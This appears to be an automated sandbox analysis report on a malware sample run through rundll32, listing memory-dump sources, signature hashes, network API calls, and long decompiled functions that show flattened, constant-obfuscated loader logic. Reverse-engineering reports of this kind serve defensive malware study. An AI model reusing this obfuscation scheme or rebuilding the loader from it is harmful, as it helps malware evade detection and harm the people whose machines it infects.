                                                                                                                                    0x002d77e4
                                                                                                                                    0x002d77e4
                                                                                                                                    0x002d794d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d794d
                                                                                                                                    0x002d773b
                                                                                                                                    0x002d7909
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7909
                                                                                                                                    0x002d7747
                                                                                                                                    0x002d7804
                                                                                                                                    0x002d783e
                                                                                                                                    0x002d7848
                                                                                                                                    0x002d784d
                                                                                                                                    0x002d7859
                                                                                                                                    0x002d78a6
                                                                                                                                    0x002d78b8
                                                                                                                                    0x002d78dd
                                                                                                                                    0x002d78e2
                                                                                                                                    0x002d78e5
                                                                                                                                    0x002d78e7
                                                                                                                                    0x002d78f0
                                                                                                                                    0x002d78fa
                                                                                                                                    0x002d78fc
                                                                                                                                    0x002d7901
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7901
                                                                                                                                    0x00000000
                                                                                                                                    0x002d78e7
                                                                                                                                    0x002d774d
                                                                                                                                    0x002d7753
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7759
                                                                                                                                    0x002d7764
                                                                                                                                    0x002d7765
                                                                                                                                    0x002d7766
                                                                                                                                    0x002d776f
                                                                                                                                    0x002d7770
                                                                                                                                    0x002d7782
                                                                                                                                    0x002d7784
                                                                                                                                    0x002d778e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d77ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002d77d7
                                                                                                                                    0x002d7a49
                                                                                                                                    0x002d7a4e
                                                                                                                                    0x002d7a51
                                                                                                                                    0x002d7a56
                                                                                                                                    0x002d7a5b
                                                                                                                                    0x002d7a60
                                                                                                                                    0x002d7a60
                                                                                                                                    0x002d7a60
                                                                                                                                    0x00000000
                                                                                                                                    0x002d770d
                                                                                                                                    0x002d7708

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                    • API String ID: 0-2206596976
                                                                                                                                    • Opcode ID: 4dfecedf9548c4a9fc94f372f178d8e57ef79a5d187916105c57515989ce7b2f
                                                                                                                                    • Instruction ID: 521389647840324b02933c4777ed4b8a6aae6ce28b1b5d793385f186276b5f62
                                                                                                                                    • Opcode Fuzzy Hash: 4dfecedf9548c4a9fc94f372f178d8e57ef79a5d187916105c57515989ce7b2f
                                                                                                                                    • Instruction Fuzzy Hash: 3552FE715083819BD378CF21C54AB9FBBE1BBC4308F108A1EE5DA96260E7B18959DF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 10012C6C
                                                                                                                                    • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                    • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                    • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                      • Part of subcall function 1001DD46: GetDlgItem.USER32(?,67083A02), ref: 1001DD53
                                                                                                                                      • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                    • String ID: Connected$Disconnected$Wait...
                                                                                                                                    • API String ID: 2263617321-2304371739
                                                                                                                                    • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                    • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                    • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                    • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C2251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C2251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E002C3DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E002D0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E002D0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E002E0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E002C7FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E002D0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E002E0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E002DC631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E002D0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E002D0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                                    0x002c225a
                                                                                                                                    0x002c2262
                                                                                                                                    0x002c2269
                                                                                                                                    0x002c226b
                                                                                                                                    0x002c2272
                                                                                                                                    0x002c2273
                                                                                                                                    0x002c2274
                                                                                                                                    0x002c2275
                                                                                                                                    0x002c227a
                                                                                                                                    0x002c2282
                                                                                                                                    0x002c2285
                                                                                                                                    0x002c228c
                                                                                                                                    0x002c2294
                                                                                                                                    0x002c2299
                                                                                                                                    0x002c22a7
                                                                                                                                    0x002c22ac
                                                                                                                                    0x002c22b0
                                                                                                                                    0x002c22b5
                                                                                                                                    0x002c22bd
                                                                                                                                    0x002c22c5
                                                                                                                                    0x002c22cd
                                                                                                                                    0x002c22d5
                                                                                                                                    0x002c22dd
                                                                                                                                    0x002c22e5
                                                                                                                                    0x002c22ed
                                                                                                                                    0x002c22f5
                                                                                                                                    0x002c22fd
                                                                                                                                    0x002c230d
                                                                                                                                    0x002c2313
                                                                                                                                    0x002c231b
                                                                                                                                    0x002c2323
                                                                                                                                    0x002c232b
                                                                                                                                    0x002c2330
                                                                                                                                    0x002c2338
                                                                                                                                    0x002c2340
                                                                                                                                    0x002c234c
                                                                                                                                    0x002c2351
                                                                                                                                    0x002c2357
                                                                                                                                    0x002c235f
                                                                                                                                    0x002c236a
                                                                                                                                    0x002c2375
                                                                                                                                    0x002c2380
                                                                                                                                    0x002c2388
                                                                                                                                    0x002c2390
                                                                                                                                    0x002c2398
                                                                                                                                    0x002c23a0
                                                                                                                                    0x002c23a8
                                                                                                                                    0x002c23ad
                                                                                                                                    0x002c23b2
                                                                                                                                    0x002c23ba
                                                                                                                                    0x002c23c7
                                                                                                                                    0x002c23c8
                                                                                                                                    0x002c23d2
                                                                                                                                    0x002c23d6
                                                                                                                                    0x002c23de
                                                                                                                                    0x002c23e6
                                                                                                                                    0x002c23ee
                                                                                                                                    0x002c23f3
                                                                                                                                    0x002c23fd
                                                                                                                                    0x002c2411
                                                                                                                                    0x002c2416
                                                                                                                                    0x002c241f
                                                                                                                                    0x002c242a
                                                                                                                                    0x002c2432
                                                                                                                                    0x002c243f
                                                                                                                                    0x002c2442
                                                                                                                                    0x002c2446
                                                                                                                                    0x002c244e
                                                                                                                                    0x002c2456
                                                                                                                                    0x002c245e
                                                                                                                                    0x002c246e
                                                                                                                                    0x002c2472
                                                                                                                                    0x002c247a
                                                                                                                                    0x002c2485
                                                                                                                                    0x002c2490
                                                                                                                                    0x002c249b
                                                                                                                                    0x002c24a3
                                                                                                                                    0x002c24ab
                                                                                                                                    0x002c24b3
                                                                                                                                    0x002c24c5
                                                                                                                                    0x002c24ca
                                                                                                                                    0x002c24d3
                                                                                                                                    0x002c24de
                                                                                                                                    0x002c24e6
                                                                                                                                    0x002c24eb
                                                                                                                                    0x002c24f3
                                                                                                                                    0x002c2500
                                                                                                                                    0x002c2501
                                                                                                                                    0x002c2505
                                                                                                                                    0x002c250d
                                                                                                                                    0x002c2515
                                                                                                                                    0x002c251d
                                                                                                                                    0x002c2525
                                                                                                                                    0x002c252d
                                                                                                                                    0x002c2532
                                                                                                                                    0x002c2537
                                                                                                                                    0x002c253f
                                                                                                                                    0x002c254c
                                                                                                                                    0x002c2550
                                                                                                                                    0x002c2558
                                                                                                                                    0x002c2560
                                                                                                                                    0x002c2566
                                                                                                                                    0x002c256a
                                                                                                                                    0x002c256f
                                                                                                                                    0x002c2573
                                                                                                                                    0x002c2578
                                                                                                                                    0x002c2580
                                                                                                                                    0x002c258b
                                                                                                                                    0x002c2596
                                                                                                                                    0x002c25a1
                                                                                                                                    0x002c25a9
                                                                                                                                    0x002c25b1
                                                                                                                                    0x002c25b9
                                                                                                                                    0x002c25c1
                                                                                                                                    0x002c25c6
                                                                                                                                    0x002c25cb
                                                                                                                                    0x002c25d3
                                                                                                                                    0x002c25e6
                                                                                                                                    0x002c25ed
                                                                                                                                    0x002c25f8
                                                                                                                                    0x002c2600
                                                                                                                                    0x002c2608
                                                                                                                                    0x002c260d
                                                                                                                                    0x002c2612
                                                                                                                                    0x002c261c
                                                                                                                                    0x002c2635
                                                                                                                                    0x002c263a
                                                                                                                                    0x002c2643
                                                                                                                                    0x002c264e
                                                                                                                                    0x002c2656
                                                                                                                                    0x002c265b
                                                                                                                                    0x002c2660
                                                                                                                                    0x002c2668
                                                                                                                                    0x002c2674
                                                                                                                                    0x002c267c
                                                                                                                                    0x002c2680
                                                                                                                                    0x002c2685
                                                                                                                                    0x002c268d
                                                                                                                                    0x002c2695
                                                                                                                                    0x002c269d
                                                                                                                                    0x002c26aa
                                                                                                                                    0x002c26ae
                                                                                                                                    0x002c26b6
                                                                                                                                    0x002c26be
                                                                                                                                    0x002c26c6
                                                                                                                                    0x002c26d3
                                                                                                                                    0x002c26d7
                                                                                                                                    0x002c26dc
                                                                                                                                    0x002c26e4
                                                                                                                                    0x002c26ef
                                                                                                                                    0x002c26fa
                                                                                                                                    0x002c26fa
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2707
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c270d
                                                                                                                                    0x002c282a
                                                                                                                                    0x002c282f
                                                                                                                                    0x002c2832
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2713
                                                                                                                                    0x002c2719
                                                                                                                                    0x002c2808
                                                                                                                                    0x002c280a
                                                                                                                                    0x002c280d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c271f
                                                                                                                                    0x002c2725
                                                                                                                                    0x002c27f2
                                                                                                                                    0x002c27f7
                                                                                                                                    0x002c27fa
                                                                                                                                    0x00000000
                                                                                                                                    0x002c272b
                                                                                                                                    0x002c2731
                                                                                                                                    0x002c27c0
                                                                                                                                    0x002c27c5
                                                                                                                                    0x002c27c8
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2733
                                                                                                                                    0x002c2739
                                                                                                                                    0x002c278b
                                                                                                                                    0x002c2790
                                                                                                                                    0x002c2793
                                                                                                                                    0x00000000
                                                                                                                                    0x002c273b
                                                                                                                                    0x002c2741
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2747
                                                                                                                                    0x002c2756
                                                                                                                                    0x002c2757
                                                                                                                                    0x002c2758
                                                                                                                                    0x002c275d
                                                                                                                                    0x002c2763
                                                                                                                                    0x002c2769
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2769
                                                                                                                                    0x002c2763
                                                                                                                                    0x002c2741
                                                                                                                                    0x002c2739
                                                                                                                                    0x002c2731
                                                                                                                                    0x002c2725
                                                                                                                                    0x002c2719
                                                                                                                                    0x002c293e
                                                                                                                                    0x002c2940
                                                                                                                                    0x002c2945
                                                                                                                                    0x002c2945
                                                                                                                                    0x002c294f
                                                                                                                                    0x002c294f
                                                                                                                                    0x002c283c
                                                                                                                                    0x002c2842
                                                                                                                                    0x002c28fd
                                                                                                                                    0x002c2902
                                                                                                                                    0x002c2905
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2848
                                                                                                                                    0x002c2848
                                                                                                                                    0x002c284e
                                                                                                                                    0x002c2936
                                                                                                                                    0x002c2854
                                                                                                                                    0x002c2854
                                                                                                                                    0x002c2856
                                                                                                                                    0x002c28d3
                                                                                                                                    0x002c28d6
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2858
                                                                                                                                    0x002c2858
                                                                                                                                    0x002c285e
                                                                                                                                    0x002c28ba
                                                                                                                                    0x002c28bf
                                                                                                                                    0x002c28c2
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2860
                                                                                                                                    0x002c2860
                                                                                                                                    0x002c2866
                                                                                                                                    0x00000000
                                                                                                                                    0x002c286c
                                                                                                                                    0x002c2889
                                                                                                                                    0x002c288e
                                                                                                                                    0x002c2891
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2891
                                                                                                                                    0x002c2866
                                                                                                                                    0x002c285e
                                                                                                                                    0x002c2856
                                                                                                                                    0x002c284e
                                                                                                                                    0x00000000
                                                                                                                                    0x002c290a
                                                                                                                                    0x002c290a
                                                                                                                                    0x002c290a
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                    • API String ID: 0-245365489
                                                                                                                                    • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                    • Instruction ID: a82cd49a131e32be59616365e9012565fc928a0840a1bb78cc01e30e2eff78b7
                                                                                                                                    • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                    • Instruction Fuzzy Hash: BDF13271518381DFD368CF61C589A5BFBE1FBD4348F108A1DF29A86261DBB18958CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C9714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C9714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
